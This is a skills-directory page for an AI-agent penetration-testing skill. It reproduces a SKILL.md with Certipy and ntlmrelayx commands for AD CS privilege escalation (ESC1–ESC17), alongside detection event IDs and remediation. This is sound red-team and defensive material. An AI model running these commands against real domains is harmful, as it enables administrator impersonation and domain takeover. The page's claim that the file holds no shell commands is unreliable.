Agent skill

Adcs Attacks

by ADScanPro in ADScanPro/Claude-AD

Active Directory Certificate Services (AD CS) escalation techniques ESC1 through ESC17, driven by hand with Certipy (ly4k).

MITAuto-check passedSecurity

Install Adcs Attacks

skills CLI
$ npx skills add ADScanPro/Claude-AD --skill adcs-attacks -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install ADScanPro/Claude-AD adcs-attacks --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/ADScanPro/Claude-AD.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/adcs-attacks .claude/skills/adcs-attacks && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
adcs-attacks
GitHub stars
209
Token cost
~3.6k tokens
SKILL.md length
1,534 words
Files
1
Skills in repo
7
Repo updated
First seen
Licence
MIT

At a glance

Active Directory Certificate Services (AD CS) escalation techniques ESC1 through ESC17, driven by hand with Certipy (ly4k).

  • The target runs a Certificate Authority and you want to find vulnerable certificate templates
  • SKILL.md covers ESC1: Enrollee-supplied SAN…, ESC2: Any Purpose / no EKU…, ESC3: Enrollment Agent… and ESC4: Template ACL is writable, plus 15 more sections
  • Instructions only: no scripts, shell commands, URLs or credentials in SKILL.md
  • CA misconfigurations

What it does

Adcs Attacks is an agent skill from ADScanPro/Claude-AD. Active Directory Certificate Services (AD CS) escalation techniques ESC1 through ESC17, driven by hand with Certipy (ly4k). Use when the target runs a Certificate Authority and you want to find vulnerable certificate templates or CA misconfigurations, request a certificate that impersonates a privileged user, and know the exact certipy command, what each ESC actually checks, the Windows Event IDs that fire, and the remediation. ESC1 and ESC8 are the two you hit most in the field.

Its SKILL.md is about 3.6k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.

It sits in Security, covering Red teaming and adversary simulation, Cryptography and Penetration testing. The repository describes itself as: Active Directory pentest methodology for Claude Code: skills, agents and slash commands for internal AD red-team work (Kerberoasting, ADCS ESC1-17, DCSync, ACL abuse, NTLM relay… The licence is MIT.

When your agent uses it

  • The target runs a Certificate Authority and you want to find vulnerable certificate templates
  • CA misconfigurations
  • Request a certificate that impersonates a privileged user
  • Know the exact certipy command

Example prompts

  • “/adcs-attacks”

What it can do on your machine

Read from SKILL.md and the folder at commit 73efec5. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    No scripts in the folder and no shell commands in SKILL.md.

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    Links to these hosts (documentation or services it may open):

    • thehacker.recipes

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Adcs Attacks loads about 3.6k tokens when it runs. Until then it costs about 124 tokens; SKILL.md has 1,534 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~124
When it runs · the whole SKILL.md, loaded when a task matches
~3.6k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

The full file from ADScanPro/Claude-AD at commit 73efec5, republished under its MIT licence (© ADScanPro). 1,534 words, ~3,621 tokens.

Download SKILL.mdSave it as .claude/skills/adcs-attacks/SKILL.md (or your agent's skills folder).
name
adcs-attacks
description
Active Directory Certificate Services (AD CS) escalation techniques ESC1 through ESC17, driven by hand with Certipy (ly4k). Use when the target runs a Certificate Authority and you want to find vulnerable certificate templates or CA misconfigurations, request a certificate that impersonates a privileged user, and know the exact certipy command, what each ESC actually checks, the Windows Event IDs that fire, and the remediation. ESC1 and ESC8 are the two you hit most in the field.

AD CS Attacks (ESC1–ESC17)

AD CS is the single richest privilege-escalation surface in modern AD. A misconfigured template or CA lets a low-privileged user obtain a certificate that authenticates as a Domain Admin. This skill uses Certipy (the ly4k project) throughout. You drive it by hand.

The whole thing starts with one enumeration pass. Run it first, read the output, then pick the ESC that applies.

certipy find -u user@corp.local -p 'Password123' -dc-ip 10.0.0.10 -vulnerable -stdout

Certipy names each finding by its ESC number, so the tool's output tells you which of the below applies. Save the full JSON/BloodHound output for the report:

certipy find -u user@corp.local -p 'Password123' -dc-ip 10.0.0.10 -vulnerable -old-bloodhound

The generic exploitation pattern, once you know the template/CA: request a cert, then authenticate with it to recover an NT hash or a TGT. -target is the CA/enrollment host and must be an FQDN, not an IP.

certipy req -u user@corp.local -p 'Password123' -dc-ip 10.0.0.10 \
  -target ca.corp.local -ca CORP-CA -template <VulnTemplate> [attack-specific flags]
certipy auth -pfx administrator.pfx -domain corp.local

certipy auth performs PKINIT and hands you the TGT plus the NT hash of the impersonated account. If it errors with an object SID mismatch, add -sid <target-SID>.


ESC1: Enrollee-supplied SAN (MOST COMMON)

What it checks. A template where low-priv users can enroll, the template has an authentication EKU (Client Authentication / PKINIT / Smart Card Logon), and CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT is set, meaning the requester chooses the Subject Alternative Name. You put a Domain Admin's UPN in the SAN and get a cert that authenticates as them.

certipy req -u user@corp.local -p 'Password123' -dc-ip 10.0.0.10 \
  -target ca.corp.local -ca CORP-CA -template VulnUserTemplate -upn administrator@corp.local
certipy auth -pfx administrator.pfx -domain corp.local

Remediation. Remove CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT from templates that have an authentication EKU. Require CA manager approval for enrollment. Restrict enrollment permissions.


ESC2: Any Purpose / no EKU template

What it checks. A template with the Any Purpose EKU (or no EKU at all) that low-priv users can enroll in. The resulting certificate can be used for client authentication (and more), so it behaves like ESC1 without the SAN requirement, subject to how the CA maps it.

certipy req -u user@corp.local -p 'Password123' -ca CORP-CA -template AnyPurposeTemplate

Remediation. Define explicit, minimal EKUs; never leave Any Purpose or empty EKU on enrollable templates.


ESC3: Enrollment Agent certificate

What it checks. A template granting the Certificate Request Agent EKU. You enroll to get an enrollment-agent cert, then use it to request a certificate on behalf of another user.

certipy req -u user@corp.local -p 'Password123' -ca CORP-CA -template EnrollAgentTemplate
certipy req -u user@corp.local -p 'Password123' -ca CORP-CA -template User \
  -on-behalf-of 'CORP\administrator' -pfx enrollment_agent.pfx

Remediation. Restrict who can enroll in enrollment-agent templates; use enrollment-agent restrictions on the CA.


ESC4: Template ACL is writable

What it checks. You have write access (GenericWrite/WriteDacl/Owner) over the template object itself. You rewrite the template to be ESC1-vulnerable, exploit it, then revert. Certipy automates the flip.

certipy template -u user@corp.local -p 'Password123' -template VulnTemplate \
  -save-old -dc-ip 10.0.0.10
# now exploit as ESC1, then restore:
certipy template -u user@corp.local -p 'Password123' -template VulnTemplate \
  -configuration VulnTemplate.json

Remediation. Remove write ACEs on template objects for non-Tier-0 principals.


ESC5: PKI object ACL / CA object control

What it checks. Control over PKI-related AD objects (the CA computer object, the CA's container in the Configuration partition, etc.). Broad; it collapses to whatever the writable object lets you change. Assess and remediate via the same ACL discipline as ESC4.

Remediation. Audit ACLs on the whole CN=Public Key Services configuration container.


ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 on the CA

What it checks. The CA has the EDITF_ATTRIBUTESUBJECTALTNAME2 flag set, which lets a requester specify an arbitrary SAN on any request regardless of the template. It is effectively domain-wide ESC1. (Note: the May 2022 certificate-mapping hardening blunts SAN-only spoofing on patched DCs, but the misconfiguration is still a finding.)

certipy req -u user@corp.local -p 'Password123' -ca CORP-CA \
  -template User -upn administrator@corp.local

Remediation. Remove the flag: certutil -config "CA\CORP-CA" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2, then restart certsvc.


ESC7: Vulnerable CA access control (ManageCA / ManageCertificates)

What it checks. You hold the ManageCA or Manage Certificates right on the CA. ManageCA lets you flip CA settings (e.g. enable ESC6) or add yourself as a certificate manager to approve pending requests.

certipy ca -u user@corp.local -p 'Password123' -ca CORP-CA -add-officer user
certipy ca -u user@corp.local -p 'Password123' -ca CORP-CA -enable-template SubCA

Remediation. Restrict ManageCA/ManageCertificates to Tier-0 CA administrators only.


ESC8: NTLM relay to CA web enrollment (MOST COMMON)

What it checks. The CA exposes the HTTP(S) web enrollment endpoint (/certsrv/, or the CES/CEP web services) without Extended Protection for Authentication (EPA/channel binding). You coerce a privileged machine account (see the coercion + NTLM relay skill: PetitPotam/PrinterBug) to authenticate to your relay, and relay that NTLM authentication to the web enrollment endpoint to enroll a certificate as the coerced machine. A DC's cert means domain compromise.

Find the relay target:

certipy find -u user@corp.local -p 'Password123' -dc-ip 10.0.0.10 -stdout | grep -i "Web Enrollment"

Stand up the relay (impacket ntlmrelayx targeting the CES/web-enrollment URL):

ntlmrelayx.py -t http://ca.corp.local/certsrv/certfnsh.asp -smb2support \
  --adcs --template DomainController

Then coerce a DC to authenticate to your relay host (PetitPotam/Coercer, see coercion skill). Relayed request yields a DC certificate; certipy auth it to a TGT.

Remediation. Enable EPA (channel binding) and require HTTPS on the web enrollment endpoints; disable HTTP. Disable web enrollment if unused. Enforce SMB signing and the NTLM-relay mitigations. Apply the coercion patches.


ESC9: No security extension (szOID_NTDS_CA_SECURITY_EXT absent)

What it checks. A template with CT_FLAG_NO_SECURITY_EXTENSION set omits the SID security extension. Combined with control over a victim account's userPrincipalName, you rewrite the victim's UPN to a target (e.g. an admin), enroll, then restore. The cert maps to the target because the SID binding is missing. Relevant chiefly on DCs configured for the weaker/compatibility certificate-mapping mode.

certipy account update -u user@corp.local -p 'Password123' \
  -user victim -upn administrator -dc-ip 10.0.0.10
certipy req -u victim@corp.local -p 'VictimPass' -ca CORP-CA -template ESC9Template
certipy account update -u user@corp.local -p 'Password123' \
  -user victim -upn victim@corp.local        # restore

Remediation. Do not set CT_FLAG_NO_SECURITY_EXTENSION. Move DCs to Full Enforcement certificate mapping (KB5014754). Restrict who can write userPrincipalName.


ESC10: Weak certificate mapping (registry)

What it checks. DC registry mapping is weakened: StrongCertificateBindingEnforcement=0 (Kerberos) or CertificateMappingMethods includes the weak UPN mapping (Schannel). Same UPN-swap idea as ESC9, driven by the mapping weakness rather than the template flag.

Remediation. Set StrongCertificateBindingEnforcement=2 (Full Enforcement) and remove weak CertificateMappingMethods bits (KB5014754).


ESC11: NTLM relay to the CA RPC endpoint (ICertPassage / IF_ENFORCEENCRYPTICERTREQUEST off)

What it checks. The CA's RPC enrollment interface (ICertPassage) does not require packet privacy (IF_ENFORCEENCRYPTICERTREQUEST disabled), so NTLM authentication can be relayed to it over RPC, the ESC8 idea against the RPC interface instead of the web endpoint.

ntlmrelayx.py -t rpc://ca.corp.local -rpc-mode ICPR -icpr-ca-name CORP-CA \
  --adcs --template DomainController

Remediation. Enforce RPC encryption on the CA (certutil -setreg CA\InterfaceFlags +IF_ENFORCEENCRYPTICERTREQUEST), restart certsvc; apply NTLM-relay mitigations.


Show full SKILL.md (625 more words)Show less

ESC12: Shell access via YubiHSM / ADCS CA key on HSM

What it checks. The CA private key is stored on a YubiHSM whose auth key is kept in a local registry value. An attacker with shell access to the CA (local admin) can recover the HSM auth key and use the CA private key to forge certificates. This is a post-compromise-of-the-CA-host issue, not a remote low-priv path.

Remediation. Protect CA host administrative access as Tier-0; do not store HSM auth material in the registry.


ESC13: Issuance policy linked to a privileged group

What it checks. A template carries an issuance policy (msDS-OIDToGroupLink) that maps to an AD group. Enrolling in the template yields a certificate that grants the rights of that group. If the linked group is privileged, low-priv enrollment escalates.

certipy find -u user@corp.local -p 'Password123' -dc-ip 10.0.0.10 -vulnerable -stdout
# request the flagged template, then auth

Remediation. Remove msDS-OIDToGroupLink mappings to privileged groups; audit issuance-policy OID links.


ESC14: Weak explicit certificate mapping (altSecurityIdentities)

What it checks. Write access to a target's altSecurityIdentities, or weak explicit mappings there, lets you bind a certificate you control to a privileged account. It is the explicit-mapping analogue of the ESC9/ESC10 implicit-mapping abuses.

Remediation. Restrict write access to altSecurityIdentities; use strong mapping values (Issuer+Serial, SKI), not weak ones (email/UPN only).


ESC15: EKUwu / application policies (CVE-2024-49019)

What it checks. On version-1 templates, a requester can inject arbitrary application policies into the CSR, adding a Client Authentication capability the template did not grant. It revives ESC1-style abuse on templates that looked safe.

certipy req -u user@corp.local -p 'Password123' -ca CORP-CA -template WebServer \
  -application-policies 'Client Authentication' -upn administrator@corp.local

Remediation. Apply the CVE-2024-49019 patch. Retire schema-version-1 templates; restrict enrollment.


ESC16: Security extension disabled CA-wide

What it checks. The CA is configured to omit the SID security extension on all issued certificates (the szOID_NTDS_CA_SECURITY_EXT OID sits in the CA's disabled-extensions list). This makes ESC9-style UPN-swap abuse work domain-wide regardless of template flags.

certipy find -u user@corp.local -p 'Password123' -dc-ip 10.0.0.10 -stdout   # flags ESC16

Remediation. Remove the OID from the CA's DisableExtensionList; move DCs to Full Enforcement mapping.


ESC17: Weak / abusable Entra (AD CS to cloud) issuance

What it checks. The newest class in the Certipy family, covering weak issuance/mapping in hybrid AD CS-to-cloud certificate flows. Certipy's find reports it when present. Treat it like the mapping-weakness classes: assess what the issued cert can authenticate as, and whether a low-priv principal can obtain it.

Remediation. Enforce strong mapping and minimal EKUs on any template feeding hybrid/cloud authentication; audit the trust.


Cross-cutting

Where to spend time. In the field ESC1 (enrollee-supplied SAN) and ESC8 (relay to web enrollment) are by far the most common wins. ESC6, ESC9/ESC10/ESC16 (mapping weaknesses) and ESC15 (EKUwu) show up on unpatched or legacy CAs. The rest depend on specific ACL or CA-config misconfigurations that certipy find -vulnerable surfaces for you.

Detection (Event IDs).

  • 4886 (certificate services received a request) and 4887 (a certificate request was approved and issued) on the CA. An anomalous SAN/UPN in an issued cert, or a machine account receiving an authentication cert it should not, is the signal.
  • 4768 (TGT requested) via PKINIT immediately after issuance, from an unexpected principal, ties the forged cert to its use.
  • 5136 on template/PKI objects for the ESC4/ESC5/ESC13 write abuses.
  • 4624/4662 for the relay and account-manipulation steps in ESC8/ESC9.

Baseline remediation across all ESCs.

  • Run certipy find -vulnerable yourself and remediate every flagged template before an attacker does.
  • Remove enrollee-supplied SAN from auth templates; enforce CA manager approval.
  • Enable EPA + HTTPS on web enrollment, enforce RPC packet privacy on the CA.
  • Move DCs to Full Enforcement certificate mapping (KB5014754); keep the SID security extension.
  • Patch CVE-2024-49019; retire schema-v1 templates.
  • Tighten ACLs on templates, CA objects, and the PKI configuration container to Tier-0 only.

Only test CAs you are authorized to assess. Use lab/generic CA names, templates and UPNs in write-ups, never a client's real values.


Reference

© ADScanPro, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

Just SKILL.md in skills/adcs-attacks of ADScanPro/Claude-AD.

Open the folder on GitHubat commit 73efec5

Compare with similar skills

Adcs Attacks next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Adcs Attacks compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Adcs Attacks this skillADScanPro/Claude-AD209—~3.6kAutomated safety check: PassMIT
Hashcat Password Recovery WorkflowAgentSecOps/SecOpsAgentKit2191 repos~3.3kAutomated safety check: NotesCustom licence
Senior Securitydavila7/claude-code-templates32k2 repos~1.1kAutomated safety check: NotesMIT
Cybersecurityohmyjahh/xquads-squads276—~895Automated safety check: PassMIT
Detecting T1548 Abuse Elevation Control Mechanismmukul975/Anthropic-Cybersecurity-Skills34k—~1.5kAutomated safety check: NotesApache-2.0
Exploiting Vulnerabilities With Metasploit Frameworkmukul975/Anthropic-Cybersecurity-Skills34k—~1.9kAutomated safety check: NotesApache-2.0

Similar skills

  • Hashcat Password Recovery Workflow

    AgentSecOps/SecOpsAgentKit

    Guides authorized password-hash recovery with hashcat for security audits, forensic cases and policy testing, starting with an explicit authorization check before any cracking runs.

    219 GitHub starsUsed in 1 repo~3.3k tokens
    SecurityAuto-check: notes
  • Senior Security

    davila7/claude-code-templates

    Comprehensive security engineering skill for application security, penetration testing, security architecture, and compliance auditing.

    32k GitHub starsUsed in 2 repos~1.1k tokens
    SecurityAuto-check: notes
  • Cybersecurity

    ohmyjahh/xquads-squads

    Squad de 15 agentes de seguranca ofensiva e defensiva (Georgia Weidman, Peter Kim, Jim Manico, Chris Sanders, Omar Santos, Marcus Carey) cobrindo pentest, red team, blue team, AppSec, recon e…

    276 GitHub stars~895 tokensUpdated 8 days ago
    SecurityAuto-check passed
  • Detecting T1548 Abuse Elevation Control Mechanism

    mukul975/Anthropic-Cybersecurity-Skills

    Detect abuse of elevation control mechanisms (T1548), including Windows UAC bypass via auto-elevating binaries like fodhelper.exe and Linux sudo/setuid/setgid exploitation, by monitoring registry…

    34k GitHub stars~1.5k tokensUpdated 1 mo ago
    SecurityAuto-check: notes
  • Exploiting Vulnerabilities With Metasploit Framework

    mukul975/Anthropic-Cybersecurity-Skills

    Uses the Metasploit Framework (msfconsole and its exploit, auxiliary, and post-exploitation modules) to validate that identified CVEs and vulnerabilities are actually exploitable, gather…

    34k GitHub stars~1.9k tokensUpdated 1 mo ago
    SecurityAuto-check: notes
  • Detecting Attacks On Historian Servers

    mukul975/Anthropic-Cybersecurity-Skills

    Detect cyber attacks on OT historian servers (OSIsoft PI, Ignition, GE Proficy, Wonderware InSQL) using a Python detector that flags unauthorized queries, data manipulation, and lateral-movement…

    34k GitHub stars~3k tokensUpdated 1 mo ago
    SecurityAuto-check passed

More from ADScanPro/Claude-AD

  • Acl Abuse

    ADScanPro/Claude-AD

    Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication…

    209 GitHub stars~2.6k tokensUpdated 1 mo ago
    Auto-check passed
  • Ad Environment Constraints

    ADScanPro/Claude-AD

    Real-world Active Directory environment constraints that silently break attacks when ignored: NTLM disabled (Kerberos fallback), AES-only KDCs (RC4 blocked by GPO), LDAP signing and channel binding…

    209 GitHub stars~2.9k tokensUpdated 1 mo ago
    Auto-check: notes
  • Ad Opsec Telemetry

    ADScanPro/Claude-AD

    The telemetry each Active Directory technique generates and what alerts a defender: Kerberoasting produces Event 4769 with RC4 encryption (0x17) and an MDI alert, DCSync produces Event 4662 with the…

    209 GitHub stars~2.4k tokensUpdated 1 mo ago
    Auto-check passed
  • Coercion Ntlm Relay

    ADScanPro/Claude-AD

    Authentication coercion (PetitPotam MS-EFSR, PrinterBug MS-RPRN, DFSCoerce MS-DFSNM) chained into NTLM relay (impacket ntlmrelayx) toward LDAP, AD CS web enrollment (ESC8), or SMB.

    209 GitHub stars~1.9k tokensUpdated 1 mo ago
    Auto-check passed
  • Kerberos Attacks

    ADScanPro/Claude-AD

    Kerberos-based Active Directory attacks driven by hand with standard tooling (Kerberoasting, AS-REP roasting, and delegation abuse: unconstrained, constrained/S4U, RBCD).

    209 GitHub stars~2.9k tokensUpdated 1 mo ago
    Auto-check: notes
  • Compliance Mapping

    ADScanPro/Claude-AD

    A high-level conceptual mapping from Active Directory attack techniques to the compliance controls they touch.

    209 GitHub stars~1.7k tokensUpdated 1 mo ago
    Auto-check passed

Categories

Questions about Adcs Attacks

What does Adcs Attacks do?

Active Directory Certificate Services (AD CS) escalation techniques ESC1 through ESC17, driven by hand with Certipy (ly4k). Adcs Attacks is an agent skill from ADScanPro/Claude-AD. Active Directory Certificate Services (AD CS) escalation techniques ESC1 through ESC17, driven by hand with Certipy (ly4k).

When should I use Adcs Attacks?

Adcs Attacks fits situations like: the target runs a Certificate Authority and you want to find vulnerable certificate templates; CA misconfigurations; request a certificate that impersonates a privileged user; know the exact certipy command.

How do I install Adcs Attacks in Claude Code?

Run `npx skills add ADScanPro/Claude-AD --skill adcs-attacks -a claude-code`. Or copy the skill folder (skills/adcs-attacks in ADScanPro/Claude-AD) into .claude/skills/adcs-attacks in your project. Claude Code loads it when a task matches its description.

How do I install Adcs Attacks in Codex?

Run `npx skills add ADScanPro/Claude-AD --skill adcs-attacks -a codex`. Or copy the skill folder (skills/adcs-attacks in ADScanPro/Claude-AD) into .agents/skills/adcs-attacks in your project. Codex loads it when a task matches its description.

Can I use Adcs Attacks in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add ADScanPro/Claude-AD --skill adcs-attacks -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/adcs-attacks, .gemini/skills/adcs-attacks, .github/skills/adcs-attacks and .opencode/skills/adcs-attacks in your project.

What does Adcs Attacks need to run?

SKILL.md names no scripts, command-line tools or credentials: Adcs Attacks is instructions for the agent only.

Does Adcs Attacks access the network?

SKILL.md names 1 domain. As links in the text: thehacker.recipes. This is read from the text; nothing was executed.

Is Adcs Attacks safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.

What licence does Adcs Attacks use?

Adcs Attacks is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Adcs Attacks use?

About 3.6k tokens (SKILL.md is roughly 14k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.

What are the alternatives to Adcs Attacks?

Skills that share tags, products or a category with Adcs Attacks: Hashcat Password Recovery Workflow (AgentSecOps/SecOpsAgentKit, 219 stars), Senior Security (davila7/claude-code-templates, 32k stars), Cybersecurity (ohmyjahh/xquads-squads, 276 stars) and Detecting T1548 Abuse Elevation Control Mechanism (mukul975/Anthropic-Cybersecurity-Skills, 34k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Adcs Attacks?

ADScanPro (a GitHub user) maintains it in ADScanPro/Claude-AD, which has 209 GitHub stars. The repository holds 7 skills in this directory. The repository was last updated on August 24, 2026.

Source: ADScanPro/Claude-AD on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.